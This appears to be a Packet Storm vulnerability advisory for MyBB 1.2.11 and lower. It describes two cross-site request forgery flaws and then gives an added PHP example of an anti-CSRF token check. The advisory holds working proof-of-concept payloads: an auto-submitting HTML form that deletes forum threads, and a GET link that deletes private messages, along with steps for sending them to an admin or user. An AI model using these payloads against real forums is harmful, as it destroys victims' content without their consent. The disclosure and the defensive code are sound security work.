mybb-xsrf.txt

2008-01-19T00:00:00
ID PACKETSTORM:62782
Type packetstorm
Reporter NBBN
Modified 2008-01-19T00:00:00

Description

                                        
                                            `####################################################  
Found: 18 January 2008  
Found by: nbbn  
MyBB Version: 1.2.11 and lower  
Type: Multiple XSRF Vulnerabilities  
####################################################  
  
####1) Delete Threads XSRF Vulnerability:  
  
<html>  
<head>  
</head>  
<body onLoad="javascript:document.formular.submit()">  
<form action="http://localhost/xampp/mybb/moderation.php" method="post"   
name="formular">  
<input type="hidden" name="action" value="do_multideletethreads" />  
<input type="hidden" name="fid" value="2" /> <!-- forumid -->  
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->  
<input type="submit" value="Delete Threads" />  
</form>  
  
  
</body>  
</html>   
  
###PoC:  
1. Create a .html file and copy the code into it.  
2. Upload the file and send the link to an admin or moderator.  
3. Done  
  
  
  
####2) Delete PMs XSRF Vulnerability:  
  
This one works via a plain GET request, with no confirmation prompt:  
http://localhost/xampp/mybb/private.php?action=delete&pmid=3  
  
  
###PoC (an easy way):  
  
1. Send this link to a user:  
http://localhost/xampp/mybb/private.php?action=delete&pmid=3  
2. Done  
  
  
  
  
  
  
`
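
A server-side guard that would refuse both requests shown above, added here as an example; it is not MyBB's code or its actual fix. The function names and the `post_key` form field are assumptions, and the sample requests are constructed from the values in the advisory.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not taken from MyBB.

/** Return the per-session anti-CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Decide whether a state-changing request may proceed.
 * Refuses anything that is not a POST (the private.php?action=delete case)
 * and any POST without the session's token (the auto-submitting form case).
 */
function csrf_check(string $method, array $post, array $session): bool
{
    if (strtoupper($method) !== 'POST') {
        return false;
    }
    $sent     = $post['post_key'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || !is_string($expected) || $sent === '' || $expected === '') {
        return false;
    }
    // Constant-time comparison, so the token cannot be guessed byte by byte.
    return hash_equals($expected, $sent);
}

// Constructed sample requests mirroring the two cases in the advisory.
$session = [];
$token   = csrf_token($session); // would be emitted as a hidden field in every form

// 1) Cross-site form: a third-party page cannot read the victim's token.
$forged_post = ['action' => 'do_multideletethreads', 'fid' => '2', 'threads' => '15|14'];
// 2) Link click: parameters arrive in the URL, so the POST body is empty.
$forged_get  = [];
// 3) The forum's own form, which includes the hidden token field.
$own_form    = $forged_post + ['post_key' => $token];

var_dump(csrf_check('POST', $forged_post, $session));
var_dump(csrf_check('GET', $forged_get, $session));
var_dump(csrf_check('POST', $own_form, $session));
```

The check belongs at the top of every handler that changes state, before the `action` parameter is dispatched.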